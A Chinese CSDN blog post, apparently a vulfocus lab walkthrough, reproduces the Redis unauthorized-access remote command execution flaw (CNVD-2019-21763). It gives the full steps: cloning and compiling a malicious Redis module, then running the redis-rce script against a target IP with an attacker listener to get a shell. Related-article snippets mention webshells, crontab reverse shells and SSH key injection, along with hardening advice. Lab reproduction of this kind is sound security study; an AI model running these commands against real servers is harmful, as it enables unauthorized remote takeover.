redis未授权访问(cnvd_2019_21763)

最新推荐文章于 2024-05-17 19:54:38 发布
最新推荐文章于 2024-05-17 19:54:38 发布
阅读量2.3k 收藏 3
点赞数
分类专栏: redis漏洞 漏洞复现 vulfocus 文章标签: redis 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_14902381/article/details/126308120
版权

漏洞影响的产品版本包括:Redis 2.x,3.x,4.x,5.x

下载工具 RedisModules-ExecuteCommand:

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand

下载后进入目录,执行 make,进行编译,得到module.so 文件

下载redis-rce:

git clone https://github.com/Ridter/redis-rce.git

将module.so复制进redis-rce,

执行命令getshell,获得flag:(-r:靶机ip,-p 靶机端口;-L:kali的ip,-P:kali的端口)

python redis-rce.py -r 192.168.221.129 -p 37269 -L 192.168.1.228 -P 4444 -f module.so

 

冬6325
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis系列漏洞总结1
08-03
1.使SET和GET命令,可以完成基本的赋值和取值操作 2.Redis是不区分命令的写的,set和SET是同个意思 3.使keys *可以列出当前数据库中的所有
VULFOCUS-redis授权访问CNVD-2019-21763
HAKUNAMATATATTA的博客
11-30 2350
redis授权访问,主从复制RCE
Redis授权访问漏洞复现 CNVD-2019-21763 & CNVD-2015-07557
MateSnake的博客
05-17 1275
Redis授权访问漏洞复现 CNVD-2019-21763 & CNVD-2015-07557
Redis远程命令执行漏洞修复方法(CNVD-2019-21763
zhangyuxun3的博客
03-30 3293
漏洞详情: 近日,Redis 被爆出Redis 4.x/5.x 版本存在主从同步命令执行漏洞,攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,风险较高。目前漏洞的利用方式已被公开。 漏洞评级: 高危漏洞 影响范围: Redis版本 >=4.0、>=5.0 漏洞复现 安装最新版 redis (5.0.5)并正常启动: 在攻击机上执行EXP,同时可以看到服务器上的日志输出: 成功后可以执行任意命令: 修复方案 (由于目前Redis厂商发布正式版本的修复
redis漏洞修复:(CNVD-2019-21763
大新新大浩浩的博客
09-22 887
redis漏洞修复:(CNVD-2019-21763) docker形式运行的redis的防火墙规则配置
Redis漏洞总结--授权--沙箱绕过--(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022-0543)
weixin_74985952的博客
09-22 794
由于在Reids 4.x及以上版本中新增了模块功能,攻击者可通过外部拓展,在Redis中实现一个新的Redis命令。攻击者可以利用该功能引入模块,在授权访问的情况下使被攻击服务器加载恶意.so 文件,从而实现远程代码执行。对于Redis服务的授权访问,首先需要确认Redis授权是否存在,使用Redis数据库客户端进行连接测试,如何没有密码,即授权漏洞存在。漏洞利用有三种利用方式,每种方式都有限制条件,本质就是使用Redis数据库操作语句在目标主机进行写入文件。注意:部分没目录权限读写权限。
redis 授权访问
weixin_66675183的博客
09-25 334
redis 授权访问&&遇到的问题
redis授权访问
ce666666的博客
02-04 1814
前言 不经历风雨,怎能看到彩虹 了解 redis是一个开源的、使用C语言编写的、支持网络交互的、可基于内存也可持久化的Key-Value数据库。 以MemcacheDB、Tokyo Tyrant为代表的key-value分布式存储,在上万并发连接下,轻松地完成高速查询。而MySQL,在几百个并发连接下,就基本上崩溃了。 安装 > wget http://download.redis.io/releases/redis-6.0.8.tar.gz tar xzf redis-6.0.8.tar.gz
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
redis_desktop_manager_2019.1.7z
07-19
RedisDesktopManager 2019.2 版本已发布,Redis Desktop Manager(RedisDesktopManager,RDM)是一个快速、简单、支持跨平台的 Redis 桌面管理工具,基于 Qt 5 开发,支持通过 SSH Tunnel 连接。
fill_redis.zip_python_redis_redis Python
09-15
在Python编程环境中,Redis是一个非常流行的键值存储系统,它被广泛用于缓存、消息队列和数据持久化等场景。`redis-py`是官方推荐的Python客户端库,用于与Redis服务器进行交互。本教程将详细介绍如何使用Python的`...
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)POC
09-29
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)exploit Celery 版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问问题...
redis 授权访问 (CNVD-2019-21763)
qq_32445755的博客
10-03 885
近日,Redis 被爆出Redis 4.x/5.x 版本存在主从同步命令执行漏洞,攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,风险较高。目前漏洞的利用方式已被公开。CNVD-2015-07557也可以复现。
redis授权访问利用汇总
今天是几号的博客
03-17 1164
原理就是在数据库中插入一条数据,将本机的公钥作为value,key值随意,然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys,把缓冲的数据保存在文件里,这样就可以在服务器端的/root/.ssh下生成一个授权的key。/var/spool/cron/ 这个目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名,比如tom建的crontab任务对应的文件就是/var/spool/cron/tom。
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 5395
redis授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
Redis授权访问-CNVD-2019-21763复现
XXokok的博客
11-25 341
Redis授权访问-CNVD-2019-21763复现
Redis授权访问漏洞
最新发布
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用程序和数据造成极大的安全风险。 攻击者通常会利用一些特定的工具或者脚本进行扫描,寻找处于授权状态的Redis服务。这些工具会自动化地进行扫描并利用默认口令或弱口令进行暴力破解,从而获取服务器权限。 为了避免Redis授权访问漏洞的发生,建议管理员在使用Redis时,采取以下措施: 1. 禁止公网访问:将Redis服务器部署在内网中,并禁止对公网开放访问。 2. 修改默认口令:使用较为复杂的口令,并定期更换口令。 3. 启用身份验证:启用Redis的身份验证功能,只允许已授权的用户访问。 4. 定期更新补丁:及时更新Redis安全补丁,以修复已知漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值